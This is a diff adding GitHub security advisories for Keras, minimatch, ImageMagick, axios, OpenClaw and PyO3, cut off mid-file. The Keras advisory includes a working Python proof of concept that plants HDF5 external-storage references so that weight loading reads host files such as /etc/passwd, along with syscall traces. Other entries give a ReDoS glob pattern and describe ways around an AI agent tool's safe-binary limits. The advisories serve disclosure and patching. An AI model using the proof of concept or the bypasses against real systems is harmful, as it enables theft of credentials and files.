b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json new file mode 100644 index 0000000000000..2ffb92e093878 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m4q-jmj6-r34q", + "modified": "2026-02-18T22:41:58Z", + "published": "2026-02-18T22:41:58Z", + "aliases": [ + "CVE-2026-1669" + ], + "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading", + "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 “external storage” and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home//.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025‑10‑19)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -> Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -> tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -> str:\n matches: list[str] = []\n def visit(name: str, obj) -> None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -> None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025‑10‑18**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025‑10‑19**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.13.0" + }, + { + "fixed": "3.13.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22057" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keras-team/keras" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:41:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json new file mode 100644 index 0000000000000..e62b787b379c0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ppc-4f35-3m26", + "modified": "2026-02-20T16:52:14Z", + "published": "2026-02-18T22:38:11Z", + "aliases": [ + "CVE-2026-26996" + ], + "summary": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern", + "details": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "minimatch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/isaacs/minimatch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:38:11Z", + "nvd_published_at": "2026-02-20T03:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json b/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json new file mode 100644 index 0000000000000..be376a074bea3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json @@ -0,0 +1,411 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42p5-62qq-mmh7", + "modified": "2026-02-24T15:44:47Z", + "published": "2026-02-24T15:44:47Z", + "aliases": [ + "CVE-2026-25987" + ], + "summary": "ImageMagick has a heap buffer over-read in its MAP image decoder", + "details": "A heap buffer over-read vulnerability exists in the MAP image decoder when processing crafted MAP files, potentially leading to crashes or unintended memory disclosure during image decoding.\n\n```\n=================================================================\n==4070926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000002b31 at pc 0x56517afbd910 bp 0x7ffc59e90000 sp 0x7ffc59e8fff0\nREAD of size 1 at 0x502000002b31 thread T0\n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-42p5-62qq-mmh7" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25987" + }, + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/commit/bbae0215e1b76830509fd20e6d37c0dd7e3e4c3a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ImageMagick/ImageMagick" + }, + { + "type": "WEB", + "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T15:44:47Z", + "nvd_published_at": "2026-02-24T02:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..3bd8b7d8813d7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-23T22:28:27Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [ + "CVE-2026-27487" + ], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": "2026-02-21T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json new file mode 100644 index 0000000000000..2a8327c2369ec --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4685-c5cp-vp95", + "modified": "2026-02-19T22:06:00Z", + "published": "2026-02-19T22:06:00Z", + "aliases": [], + "summary": "OpenClaw safeBins stdin-only bypass via sort output and recursive grep flags", + "details": "## Summary\n`tools.exec.safeBins` could be bypassed for filesystem access when `sort` output flags (`-o` / `--output`) or recursive `grep` flags were allowed through safe-bin execution paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched versions: `>= 2026.2.19`\n- Latest published version at triage time: `2026.2.17`\n\n## Impact\nIn deployments that enabled `tools.exec.safeBins`, an attacker with access to command execution flows could turn intended stdin-only safe-bin usage into file writes (`sort -o`) or recursive file reads (`grep -R`).\n\n## Fix Commit(s)\n- `cfe8457a0f4aae5324daec261d3b0aad1461a4bc`\n\nThanks @nedlir for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4685-c5cp-vp95" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cfe8457a0f4aae5324daec261d3b0aad1461a4bc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184", + "CWE-78" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T22:06:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json new file mode 100644 index 0000000000000..c657392d110ca --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47qc-857f-7w7f", + "modified": "2026-02-19T20:25:46Z", + "published": "2026-02-19T20:25:46Z", + "aliases": [], + "summary": "PyO3 has type confusion when accessing data from sublasses of subclasses of native types with `abi3` feature", + "details": "PyO3 0.28.1 added support for `#[pyclass(extends=PyList)] struct NativeSub` (and other native types) when targeting Python 3.12 and up with the `abi3` feature.\n\nIt was discovered that subclasses of such classes would use the type of the subclass when attempting to access to data of `NativeSub` contained within Python objects, amounting to memory corruption.\n\nPyO3 0.28.2 fixed the issue by using the type of (e.g.) `NativeSub` correctly.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "pyo3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.28.0" + }, + { + "fixed": "0.28.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/pull/5807#issuecomment-3913251784" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/commit/75abd8602896b350fd8c778e52e0a74b4644ccca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PyO3/pyo3" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/releases/tag/v0.28.2" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:25:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json b/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json new file mode 100644 index 0000000000000..9d6019bf9db07 --- /dev/null +++ 